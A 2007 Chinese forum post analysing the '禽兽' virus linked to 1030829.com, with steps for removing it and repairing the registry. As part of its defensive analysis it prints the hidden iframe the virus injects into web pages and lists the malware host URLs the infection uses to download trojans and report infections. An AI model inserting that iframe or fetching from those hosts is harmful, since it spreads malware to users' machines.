下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 7529|回复: 0
打印 上一主题 下一主题

连接到1030829网页的“禽兽”病毒

[复制链接]
  • TA的每日心情
    奋斗
    前天 10:28
  • 签到天数: 2370 天

    [LV.Master]伴坛终老

    跳转到指定楼层
    1
    发表于 2007-10-1 00:32:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    一、1030829.com的“禽兽”病毒破坏性非常严重,主要特征包括:
      1.破坏安全模式 禁用系统的一些自我保护功能(自动更新,防火墙等)
      2.IFEO映像劫持杀毒软件以及常用安全工具
      3.禁用任务管理器(打不开)
      4.修改主页(IE首页被锁定)
      5.关闭带有“杀毒”等字样的窗口
      6.感染html等网页文件
      7.删除gho文件,使用户无法还原系统
      8.U盘传播
      9.疯狂下载多种木马和流氓软件(多达20多种木马)


    二、关于中病毒“1030829”的几方面重点说明

    1030829的中毒者在禽兽病毒和其他一些木马作用下,系统将完全处于无保护的状态.在没有任何工具的情况下 救活系统的可能性几乎为0!!

    1030829病毒不光劫持常见杀毒软件和小工具,还劫持了msconfig.exe regedit.exe等系统常用的辅助工具。在每个分区下面生成
    autorun.inf 和niu.exe,网页中被加插“<IfrAmE src=http://www.1030829.com/0.htm width=0 height=0></IfrAmE>”代码


    注意连接到包含“1030829.com ”网页的几个链接地址

    1. 连接hxxp://www.1030829.com/pu/tj.asp做感染统计
    2. 下载hxxp://*.1030829.com/guanjian.txt到%system32%\text1.txt
    3. 连结下载hxxp://*.1030829.com/suoding.txt到%system32%\d.txt, ,把IE首页修改成d.txt中的地址
    4. 连接到http://*.1030829.com/down.txt(进行下载)存放于%system32%文件夹下,读取里面的地址下载木马
    5. 下载http://*.1030829.com/tempA.exe~http://w.1030829.com/tempW.exe到%system32%文件夹下

    1030829“禽兽”留言:禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽
    又是恶毒的1030829.com在做祟。之所以叫它“禽兽”病毒,是因为它此次在破坏显示隐藏文件时,将选项名称改为“禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽”。中毒电脑会被连接到1080829.com 下的一些特点网页,除下载大量木马外,还进行中毒数据的反馈统计。


    三、清除与解决这个禽兽的1030829还真是不容易,专杀步骤与所需工具的使用如下



    1030829禽兽病毒专杀-解决与删除1030829“禽兽”病毒



    一、清除病毒主程序
    www.reizz.net/bbs2“病毒专杀”区下载sreng2.zip和IceSword120_cn.zip(冰刃)

    1.解压IceSword122cn.zip,把Icesword.exe改个名字为1.com
    运行 切换到进程窗口 结束%system32%\
    crsss.exe进程注意是crsss.exe不是csrss.exe,一定不要搞错



    2.点击左下角文件按钮 删除如下文件
    %system32%\crsss.exe
    和每个分区下的niu.exe和autorun.inf(一定不要落下这一步)





    二、修复被病毒破坏的系统
    1.打开sreng
    启动项目         注册表
    删除所有红色的IFEO映像劫持项目
    并删除
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的
                  <crsss><C:\WINDOWS\system32\crsss.exe>         [N/A]

    2.还是sreng中
    系统修复-Windows Shell/IE
    勾选如下项目
    允许在Windows 2000/XP/Server 2003中使用任务管理器
    设置主页为"about:blank"
    允许Internet Explorer选项窗口和选项窗口的所有内容
    然后点击修复

    3.sreng中
    系统修复-高级修复
    修复安全模式

    4.找一台未被感染病毒的与中毒电脑系统相同的电脑 导出未中毒电脑的
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden整个键的内容
    并在中毒电脑中导入XP系统可以把下列文字拷入记事本 然后重命名为1.reg 双击导入注册表
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
    Advanced\Folder\Hidden]
    "Text"="@shell32.dll,-30499"
    "Type"="group"
    "Bitmap"=hex
    (2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
      
    00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53
    ,00,\
      
    48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00
    ,00,\
             00
    "HelpID"="shell.hlp#51131"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
    Advanced\Folder\Hidden\NOHIDDEN]
    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30501"
    "Type"="radio"
    "CheckedValue"=dword:00000002
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000002
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51104"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
    Advanced\Folder\Hidden\SHOWALL]
    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30500"
    "Type"="radio"
    "CheckedValue"=dword:00000001
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000002
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51105"


    三、清除病毒下载的木马(由于下载的木马随时变化,所以本文中的方法仅供参考)

    1.首先重命名如下文件
    C:\WINDOWS\system32\kvmxdma.dll
    C:\WINDOWS\system32\rsmycpm.dll
    C:\WINDOWS\system32\kvdxcma.dll
    C:\WINDOWS\system32\avwgcmn.dll
    C:\WINDOWS\system32\ratbdpi.dll
    C:\WINDOWS\system32\raqjapi.dll
    C:\WINDOWS\system32\rsjzbpm.dll
    C:\WINDOWS\system32\avzxdmn.dll
    C:\WINDOWS\system32\kawdbzy.dll
    C:\WINDOWS\system32\rarjbpi.dll
    C:\WINDOWS\system32\mypern0.dll
    (这些是前面分析过的随机7位dll木马,用重命名大法清除)

    2.打开sreng
    “启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
    Windows dvne RunThem / dvne

    在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
    acpidisk / acpidisk
    系统修复 高级修复
    重置winsock

    3.重启计算机
    双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定,删除如下文件
    C:\WINDOWS\system32\drivers\svchost.exe
    C:\WINDOWS\system32\msavp.dll
    C:\WINDOWS\upxdnd.exe
    C:\WINDOWS\system32\drivers\acpidisk.sys
    c:\progra~1\yqiz文件夹
    以及你刚重命名的
    C:\WINDOWS\system32\kvmxdma.dll
    C:\WINDOWS\system32\rsmycpm.dll
    C:\WINDOWS\system32\kvdxcma.dll
    C:\WINDOWS\system32\avwgcmn.dll
    C:\WINDOWS\system32\ratbdpi.dll
    C:\WINDOWS\system32\raqjapi.dll
    C:\WINDOWS\system32\rsjzbpm.dll
    C:\WINDOWS\system32\avzxdmn.dll
    C:\WINDOWS\system32\kawdbzy.dll
    C:\WINDOWS\system32\rarjbpi.dll
    C:\WINDOWS\system32\mypern0.dll


    四、使用工具修复受感染的htm等网页文件

    最后再次提醒大家一定要关闭电脑的自动播放功能,不要让此类恶性U盘病毒再如此肆意传播了!

    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩 转发到微博

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表